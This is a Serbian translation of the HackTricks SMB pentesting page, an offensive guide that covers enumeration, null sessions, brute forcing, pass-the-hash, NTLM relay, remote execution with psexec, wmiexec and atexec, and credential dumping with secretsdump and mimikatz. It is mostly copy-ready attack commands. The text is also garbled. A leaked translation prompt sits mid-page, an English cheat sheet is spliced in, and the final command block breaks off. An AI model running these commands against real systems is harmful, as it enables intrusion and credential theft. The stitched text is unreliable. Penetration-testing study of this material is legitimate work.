# 139,445 - Pentesting SMB

<details>

<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Drugi načini podrške HackTricks-u:

* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.

</details>

## **Port 139**

**_Network Basic Input Output System_ (NetBIOS)** je softverski protokol dizajniran da omogući aplikacijama, računarima i desktop računarima unutar lokalne mreže (LAN) da komuniciraju sa mrežnom opremom i **olakšaju prenos podataka preko mreže**. Identifikacija i lokacija softverskih aplikacija koje rade na NetBIOS mreži postiže se putem njihovih NetBIOS imena, koja mogu biti do 16 karaktera duga i često se razlikuju od imena računara. NetBIOS sesija između dve aplikacije se pokreće kada jedna aplikacija (kao klijent) izda komandu za "pozivanje" druge aplikacije (kao server) koristeći **TCP Port 139**.
```
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
```
## Port 445

Tehnički, Port 139 se naziva 'NBT preko IP-a', dok se Port 445 identifikuje kao 'SMB preko IP-a'. Akronim SMB označava 'Server Message Blocks', koji je moderno poznat kao Common Internet File System (CIFS). Kao protokol mrežnog sloja aplikacije, SMB/CIFS se uglavnom koristi za omogućavanje deljenog pristupa datotekama, štampačima, serijskim portovima i olakšavanje različitih oblika komunikacije između čvorova na mreži.

Na primer, u kontekstu Windowsa, ističe se da SMB može direktno raditi preko TCP/IP-a, eliminirajući potrebu za NetBIOS preko TCP/IP-a, kroz upotrebu porta 445. Nasuprot tome, na različitim sistemima se primenjuje upotreba porta 139, što ukazuje na to da se SMB izvršava zajedno sa NetBIOS preko TCP/IP-a.
```
445/tcp   open  microsoft-ds  Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
```
### SMB

**Server Message Block (SMB)** protokol, koji radi u modelu **klijent-server**, dizajniran je za regulisanje **pristupa datotekama**, direktorijumima i drugim mrežnim resursima kao što su štampači i ruteri. Pretežno se koristi u seriji operativnih sistema **Windows**, SMB obezbeđuje kompatibilnost unazad, omogućavajući uređajima sa novijim verzijama Microsoft-ovog operativnog sistema da se bez problema povezuju sa onima koji koriste starije verzije. Dodatno, projekat **Samba** pruža besplatno softversko rešenje koje omogućava implementaciju SMB-a na **Linux** i Unix sistemima, olakšavajući komunikaciju između različitih platformi putem SMB-a.

Deljenja, koja predstavljaju **proizvoljne delove lokalnog fajl sistema**, mogu biti obezbeđena od strane SMB servera, čime se hijerarhija čini delimično **nezavisnom** od stvarne strukture servera. **Access Control Lists (ACLs)**, koje definišu **prava pristupa**, omogućavaju detaljnu kontrolu nad korisničkim dozvolama, uključujući atribute kao što su **`execute`**, **`read`** i **`full access`**. Ova prava mogu biti dodeljena pojedinačnim korisnicima ili grupama, na osnovu deljenja, i razlikuju se od lokalnih dozvola postavljenih na serveru.

### Deljenje IPC$

Pristup deljenju IPC$ može se dobiti putem anonimne nule sesije, što omogućava interakciju sa uslugama izloženim putem imenovanih cevi. Alatka `enum4linux` je korisna u tu svrhu. Kada se pravilno koristi, omogućava dobijanje:

- Informacija o operativnom sistemu
- Detalja o nadređenoj domeni
- Pregled lokalnih korisnika i grupa
- Informacija o dostupnim SMB deljenjima
- Efektivne sistemske bezbednosne politike

Ova funkcionalnost je ključna za mrežne administratore i bezbednosne stručnjake kako bi procenili bezbednost SMB (Server Message Block) usluga u mreži. `enum4linux` pruža sveobuhvatan pregled SMB okruženja ciljnog sistema, što je ključno za identifikaciju potencijalnih ranjivosti i osiguravanje da su SMB usluge pravilno zaštićene.
```bash
enum4linux -a target_ip
```
Gornja komanda je primer kako se `enum4linux` može koristiti za izvršavanje potpune enumeracije protiv cilja koji je određen sa `target_ip`.


## Šta je NTLM

Ako ne znate šta je NTLM ili želite da saznate kako funkcioniše i kako ga zloupotrebiti, vrlo će vam biti interesantna ova stranica o **NTLM-u** gde je objašnjeno **kako ovaj protokol funkcioniše i kako možete iskoristiti:**

{% content-ref url="../windows-hardening/ntlm/" %}
[ntlm](../windows-hardening/ntlm/)
{% endcontent-ref %}

## **Enumeracija servera**

### **Skeniranje** mreže u potrazi za hostovima:
```bash
nbtscan -r 192.168.0.1/24
```
### Verzija SMB servera

Da biste pronašli moguće exploite za SMB verziju, važno je znati koja verzija se koristi. Ako ova informacija ne prikazuje u drugim korišćenim alatima, možete:

* Koristiti **MSF** pomoćni modul \_**auxiliary/scanner/smb/smb\_version**
* Ili ovaj skript:
```bash
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1
```
### **Pretraga eksploatacija**
```bash
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
```
### **Mogući** pristupni podaci

| **Korisničko ime(i)** | **Uobičajene lozinke**                     |
| -------------------- | ----------------------------------------- |
| _(prazno)_           | _(prazno)_                                |
| gost                 | _(prazno)_                                |
| Administrator, admin | _(prazno)_, password, administrator, admin |
| arcserve             | arcserve, backup                          |
| tivoli, tmersrvd     | tivoli, tmersrvd, admin                   |
| backupexec, backup   | backupexec, backup, arcada                |
| test, lab, demo      | password, test, lab, demo                 |

### Brute Force

* [**SMB Brute Force**](../generic-methodologies-and-resources/brute-force.md#smb)

### Informacije o SMB okruženju

### Dobijanje informacija
```bash
#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>

#Connect to the rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb  --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds
#You can use querydispinfo and enumdomusers to query user information

#Dump user information
/usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@]<targetName or address>

#Map possible RPC endpoints
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
```
### Nabrojavanje korisnika, grupa i prijavljenih korisnika

Ove informacije već bi trebalo da budu prikupljene pomoću enum4linux i enum4linux-ng alata.
```bash
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]

ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "

rpcclient -U "" -N 10.10.10.10
enumdomusers
enumdomgroups
```
### Nabrojavanje lokalnih korisnika

[Impacket](https://github.com/fortra/impacket/blob/master/examples/lookupsid.py)
```bash
lookupsid.py -no-pass hostname.local
```
Sledeći sadržaj je iz knjige o tehnikama hakovanja. Sledeći sadržaj je iz fajla /hive/hacktricks/network-services-pentesting/pentesting-smb.md. Prevedite relevantni engleski tekst na srpski i vratite prevod zadržavajući isti markdown i html sintaksu. Nemojte prevoditi stvari poput koda, imena tehnika hakovanja, hakovanja, imena platformi u oblaku/SaaS (poput Workspace, aws, gcp...), reči 'leak', pentestinga i oznaka markdowna. Takođe, nemojte dodavati ništa osim prevoda i sintakse markdowna.
```bash
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
```
### Metasploit - Nabrojavanje lokalnih korisnika

Metasploit je moćan alat za testiranje penetracije koji se često koristi za pronalaženje slabosti u mrežnim servisima. Jedna od korisnih funkcija Metasploita je mogućnost nabrojavanja lokalnih korisnika na ciljnom sistemu.

Da biste nabrojali lokalne korisnike pomoću Metasploita, možete koristiti modul `enum_users`. Ovaj modul koristi SMB protokol za komunikaciju sa ciljnim sistemom i prikuplja informacije o lokalnim korisnicima.

Evo kako možete koristiti ovaj modul:

1. Pokrenite Metasploit okruženje.
2. Unesite komandu `use auxiliary/scanner/smb/enum_users`.
3. Podesite opcije modula prema potrebama, kao što su `RHOSTS` (ciljni IP adresa) i `RPORT` (SMB port).
4. Izvršite modul komandom `run`.

Metasploit će zatim pokušati da se poveže sa ciljnim sistemom putem SMB protokola i nabroja lokalne korisnike. Rezultati će biti prikazani u konzoli, a možete ih koristiti za dalje istraživanje i testiranje penetracije.

Napomena: Uvek se pridržavajte zakona i etičkih smernica prilikom korišćenja Metasploita ili bilo kojeg drugog alata za testiranje penetracije.
```bash
use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
run
```
### **Enumeracija LSARPC i SAMR rpcclient**

{% content-ref url="pentesting-smb/rpcclient-enumeration.md" %}
[rpcclient-enumeration.md](pentesting-smb/rpcclient-enumeration.md)
{% endcontent-ref %}

### GUI konekcija sa linuxa

#### U terminalu:

`xdg-open smb://cascade.htb/`

#### U prozoru pregledača fajlova (nautilus, thunar, itd)

`smb://friendzone.htb/general/`

## Enumeracija deljenih foldera

### Lista deljenih foldera

Uvek je preporučljivo proveriti da li možete pristupiti nečemu, ako nemate pristupne podatke pokušajte koristiti **null** **pristupne podatke/gost korisnika**.
```bash
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash

smbmap -H <IP> [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
smbmap -R -u "username" -p "password" -H <IP> [-P <PORT>] #Recursive list

crackmapexec smb <IP> -u '' -p '' --shares #Null user
crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares #Guest user
```
### **Povezivanje/Listanje deljene fascikle**

Da biste se povezali sa deljenom fasciklom na SMB serveru, možete koristiti alat `smbclient`. Sledeća komanda će vam omogućiti da se povežete sa serverom i listate sadržaj deljene fascikle:

```plaintext
smbclient //<IP_adresa>/<naziv_fascikle> -U <korisničko_ime>
```

Zamenite `<IP_adresa>` sa IP adresom SMB servera i `<naziv_fascikle>` sa nazivom deljene fascikle koju želite da listate. Takođe, zamenite `<korisničko_ime>` sa korisničkim imenom koje će se koristiti za autentifikaciju na serveru.

Nakon izvršavanja ove komande, bićete povezani sa deljenom fasciklom i moći ćete da vidite njen sadržaj.
```bash
#Connect using smbclient
smbclient --no-pass //<IP>/<Folder>
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
#Use --no-pass -c 'recurse;ls'  to list recursively with smbclient

#List with smbmap, without folder it list everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
```
### **Ručno nabrojavanje Windows deljenja i povezivanje sa njima**

Moguće je da ste ograničeni u prikazu bilo kojih deljenja na ciljnom računaru i kada pokušate da ih nabrojite, izgleda kao da nema nijedno deljenje sa kojim možete da se povežete. Zato može biti vredno pokušaja da se ručno povežete sa deljenjem. Da biste ručno nabrojali deljenja, možete tražiti odgovore poput NT\_STATUS\_ACCESS\_DENIED i NT\_STATUS\_BAD\_NETWORK\_NAME, kada koristite važeću sesiju (na primer, nultu sesiju ili važeće akreditive). Ovi odgovori mogu ukazivati da li deljenje postoji i da nemate pristup ili da deljenje uopšte ne postoji.

Uobičajena imena deljenja za Windows ciljeve su:

* C$
* D$
* ADMIN$
* IPC$
* PRINT$
* FAX$
* SYSVOL
* NETLOGON

(Uobičajena imena deljenja preuzeta iz knjige _**Network Security Assessment 3rd edition**_)

Možete pokušati da se povežete sa njima koristeći sledeću komandu:
```bash
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
```
ili ovaj skript (koristeći null sesiju)
```bash
#/bin/bash

ip='<TARGET-IP-HERE>'
shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON')

for share in ${shares[*]}; do
output=$(smbclient -U '%' -N \\\\$ip\\$share -c '')

if [[ -z $output ]]; then
echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created
else
echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME)
fi
done
```
## Pentesting SMB

### SMB Enumeration

#### Nmap

```plaintext
nmap -p 139,445 --script smb-enum-* <target>
```

#### Enum4linux

```plaintext
enum4linux -a <target>
```

#### smbmap

```plaintext
smbmap -H <target>
```

#### smbclient

```plaintext
smbclient -L //<target>
```

### SMB Exploitation

#### Null Session

```plaintext
rpcclient -U "" <target>
```

#### SMBClient

```plaintext
smbclient //<target>/IPC$ -U "" -N
```

#### Metasploit

```plaintext
use exploit/windows/smb/ms08_067_netapi
```

### SMB Relay

#### Responder

```plaintext
responder -I eth0 -wrf
```

#### NTLM Relayx

```plaintext
ntlmrelayx.py -tf targets.txt -smb2support
```

#### Metasploit

```plaintext
use auxiliary/server/capture/smb
```

### SMB Lateral Movement

#### Psexec

```plaintext
psexec.py <target> -u <username> -p <password> -c <command>
```

#### WMI

```plaintext
wmic /node:<target> /user:<username> /password:<password> process call create "<command>"
```

#### PowerShell

```plaintext
Invoke-WmiMethod -ComputerName <target> -Credential <username> -Class Win32_Process -Name Create -ArgumentList "<command>"
```

#### Mimikatz

```plaintext
mimikatz.exe "sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<ntlm_hash> /run:<command>"
```

#### Empire

```plaintext
powershell-import /path/to/Invoke-Psexec.ps1
Invoke-Psexec -Command "<command>" -ComputerName <target> -Username <username> -Password <password>
```

#### CrackMapExec

```plaintext
crackmapexec smb <target> -u <username> -p <password> --exec-command "<command>"
```

#### BloodHound

```plaintext
powershell-import /path/to/SharpHound.ps1
Invoke-BloodHound -CollectionMethod All
```

### SMB Post-Exploitation

#### Impacket

```plaintext
secretsdump.py -just-dc-ntlm <target>
```

#### Metasploit

```plaintext
use post/windows/gather/smart_hashdump
```

#### Mimikatz

```plaintext
mimikatz.exe "lsadump::sam"
```

#### CrackMapExec

```plaintext
crackmapexec smb <target> -u <username> -p <password> --sam
```

#### BloodHound

```plaintext
powershell-import /path/to/SharpHound.ps1
Invoke-BloodHound -CollectionMethod All
```
```bash
smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
```
### **Nabrajanje deljenja sa Windows / bez alata treće strane**

PowerShell
```powershell
# Retrieves the SMB shares on the locale computer.
Get-SmbShare
Get-WmiObject -Class Win32_Share
# Retrieves the SMB shares on a remote computer.
get-smbshare -CimSession "<computer name or session object>"
# Retrieves the connections established from the local SMB client to the SMB servers.
Get-SmbConnection
```
CMD konzola
```shell
# List shares on the local computer
net share
# List shares on a remote computer (including hidden ones)
net view \\<ip> /all
```
MMC Snap-in (graficki)
```shell
# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc
```
explorer.exe (graficki), unesite `\\<ip>\` da biste videli dostupne ne-sakrivene deljene resurse.

### Montirajte deljenu fasciklu
```bash
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
```
### **Preuzimanje fajlova**

Pročitajte prethodne sekcije da biste naučili kako se povezati sa korisničkim podacima/Pass-the-Hash tehnikom.
```bash
#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
```

```bash
#Download all
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *
#Download everything to current directory
```
Komande:

* maska: specificira masku koja se koristi za filtriranje fajlova unutar direktorijuma (npr. "" za sve fajlove)
* recurse: uključuje rekurziju (podrazumevano: isključeno)
* prompt: isključuje traženje imena fajlova (podrazumevano: uključeno)
* mget: kopira sve fajlove koji se podudaraju sa maskom sa hosta na klijentsku mašinu

(_Informacije preuzete sa man stranice smbclient-a_)

### Pretraga deljenih foldera domena

* [**Snaffler**](https://github.com/SnaffCon/Snaffler)\*\*\*\*
```bash
Snaffler.exe -s -d domain.local -o snaffler.log -v data
```
* [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) pauk.
* `-M spider_plus [--share <ime_deljenja>]`
* `--pattern txt`
```bash
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
```
Posebno interesantni su fajlovi nazvani **`Registry.xml`** jer **mogu sadržati lozinke** za korisnike konfigurisane sa **autologon**-om putem Group Policy-ja. Ili fajlovi **`web.config`** jer sadrže akreditive.

{% hint style="info" %}
**SYSVOL deljenje** je **čitljivo** od strane svih autentifikovanih korisnika u domenu. Tamo možete **pronaći** mnogo različitih batch, VBScript i PowerShell **skripti**.\
Trebali biste **proveriti** skripte unutar njega jer biste mogli **pronaći** osetljive informacije kao što su **lozinke**.
{% endhint %}

## Čitanje registra

Možda ćete moći **pročitati registar** koristeći neke otkrivene akreditive. Impacket **`reg.py`** vam omogućava da pokušate:
```bash
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
```
## Post Eksploatacija

Podrazumevana konfiguracija **Samba** servera obično se nalazi u `/etc/samba/smb.conf` i može sadržati neke **opasne konfiguracije**:

| **Podešavanje**             | **Opis**                                                            |
| --------------------------- | ------------------------------------------------------------------- |
| `browseable = yes`          | Dozvoljava li prikazivanje dostupnih deljenja u trenutnom deljenju?  |
| `read only = no`            | Da li zabranjuje kreiranje i izmenu fajlova?                         |
| `writable = yes`            | Dozvoljava li korisnicima kreiranje i izmenu fajlova?                |
| `guest ok = yes`            | Dozvoljava li povezivanje na servis bez korišćenja lozinke?          |
| `enable privileges = yes`   | Poštuje li privilegije dodeljene određenom SID-u?                    |
| `create mask = 0777`        | Koje dozvole treba dodeliti novo kreiranim fajlovima?                |
| `directory mask = 0777`     | Koje dozvole treba dodeliti novo kreiranim direktorijumima?          |
| `logon script = script.sh`  | Koji skript treba izvršiti pri prijavi korisnika?                    |
| `magic script = script.sh`  | Koja skripta treba izvršiti kada se skripta zatvori?                  |
| `magic output = script.out` | Gde treba čuvati izlaz magične skripte?                              |

Komanda `smbstatus` daje informacije o **serveru** i o **ko je povezan**.

## Autentifikacija korišćenjem Kerberosa

Možete se **autentifikovati** na **Kerberos** koristeći alate **smbclient** i **rpcclient**:
```bash
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
```
## **Izvršavanje komandi**

### **crackmapexec**

crackmapexec može izvršiti komande **zloupotrebom** bilo kojeg od **mmcexec, smbexec, atexec, wmiexec** pri čemu je **wmiexec** metoda **podrazumevana**. Možete naznačiti koju opciju želite koristiti pomoću parametra `--exec-method`:
```bash
apt-get install crackmapexec

crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
# Using --exec-method {mmcexec,smbexec,atexec,wmiexec}

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sessions #Get sessions (
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --loggedon-users #Get logged-on users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --disks #Enumerate the disks
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --users #Enumerate users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --groups # Enumerate groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --local-groups # Enumerate local groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get password policy
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
```
### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md)

Oba izbora će **kreirati novu uslugu** (koristeći _\pipe\svcctl_ putem SMB-a) na žrtvinoj mašini i koristiti je za **izvršavanje nečega** (**psexec** će **prebaciti** izvršnu datoteku na ADMIN$ deljenje, a **smbexec** će pokazivati na **cmd.exe/powershell.exe** i staviti u argumente payload --**tehnika bez datoteke-**-).\
**Više informacija** o [**psexec** ](../windows-hardening/ntlm/psexec-and-winexec.md)i [**smbexec**](../windows-hardening/ntlm/smbexec.md).\
U **kali** se nalazi na /usr/share/doc/python3-impacket/examples/
```bash
#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
```
Korišćenjem **parametra** `-k` možete se autentifikovati putem **kerberosa** umesto **NTLM-a**.

### [wmiexec](../windows-hardening/ntlm/wmicexec.md)/dcomexec

Neprimetno izvršite komandnu liniju bez dodirivanja diska ili pokretanja nove usluge koristeći DCOM putem **porta 135**.\
U **kali**-ju se nalazi na /usr/share/doc/python3-impacket/examples/
```bash
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
```
Korišćenjem **parametra** `-k` možete se autentifikovati putem **kerberosa** umesto **NTLM**-a.
```bash
#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
```
### [AtExec](../windows-hardening/ntlm/atexec.md)

Izvršite komande putem Task Scheduler-a (koristeći _\pipe\atsvc_ putem SMB-a).\
U **kali** se nalazi na /usr/share/doc/python3-impacket/examples/
```bash
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"
```
## Impacket referenca

[https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)

## **Bruteforce korisničke akreditive**

**Ovo se ne preporučuje, možete blokirati nalog ako premašite maksimalan dozvoljen broj pokušaja**
```bash
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
```
## Napad preko SMB preusmeravanja

Ovaj napad koristi Responder alat za **hvatanje SMB autentifikacionih sesija** u internoj mreži i njihovo **preusmeravanje** na **ciljnu mašinu**. Ako je autentifikacija **uspešna**, automatski će vas prebaciti u **sistemski** **shell**.\
[**Više informacija o ovom napadu možete pronaći ovde.**](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)

## SMB-Trap

Windows biblioteka URLMon.dll automatski pokušava da se autentifikuje na hostu kada stranica pokuša da pristupi nekom sadržaju putem SMB-a, na primer: `img src="\\10.10.10.10\path\image.jpg"`

Ovo se dešava sa funkcijama:

* URLDownloadToFile
* URLDownloadToCache
* URLOpenStream
* URLOpenBlockingStream

Koje koriste neki pregledači i alati (kao što je Skype)

![Izvor: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (93).png>)

### SMBTrap korišćenjem MitMf

![Izvor: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (94).png>)

## NTLM krađa

Slično kao kod SMB preusmeravanja, postavljanje zlonamernih fajlova na ciljni sistem (putem SMB-a, na primer) može izazvati pokušaj SMB autentifikacije, što omogućava presretanje NetNTLMv2 heša pomoću alata kao što je Responder. Heš se zatim može dešifrovati offline ili koristiti u [napadu preko SMB preusmeravanja](pentesting-smb.md#smb-relay-attack).

[Pogledajte: ntlm\_theft](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft)

## HackTricks Automatske Komande
```
Protocol_Name: SMB    #Protocol Abbreviation if there is one.
Port_Number:  137,138,139     #Comma separated if there is more than one.
Protocol_Description: Server Message Block         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for SMB
Note: |
While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’. Server Message Block in modern language is also known as Common Internet File System. The system operates as an application-layer network protocol primarily used for offering shared access to files, printers, serial ports, and other sorts of communications between nodes on a network.

#These are the commands I run in order every time I see an open SMB port

With No Creds
nbtscan {IP}
smbmap -H {IP}
smbmap -H {IP} -u null -p null
smbmap -H {IP} -u guest
smbclient -N -L //{IP}
smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
rpcclient {IP}
rpcclient -U "" {IP}
crackmapexec smb {IP}
crackmapexec smb {IP} --pass-pol -u "" -p ""
crackmapexec smb {IP} --pass-pol -u "guest" -p ""
GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
getArch.py -target {IP}

With Creds
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request

https://book.hacktricks.xyz/pentesting/pentesting-smb

Entry_2:
Name: Enum4Linux
Description: General SMB Scan
Command: enum4linux -a {IP}

Entry_3:
Name: Nmap SMB Scan 1
Description: SMB Vuln Scan With Nmap
Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}

Entry_4:
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script 'smb-vuln*' -Pn -p 139,445 {IP}

Entry_5:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb

Entry_6:
Name: SMB/SMB2 139/445 consolesless mfs enumeration
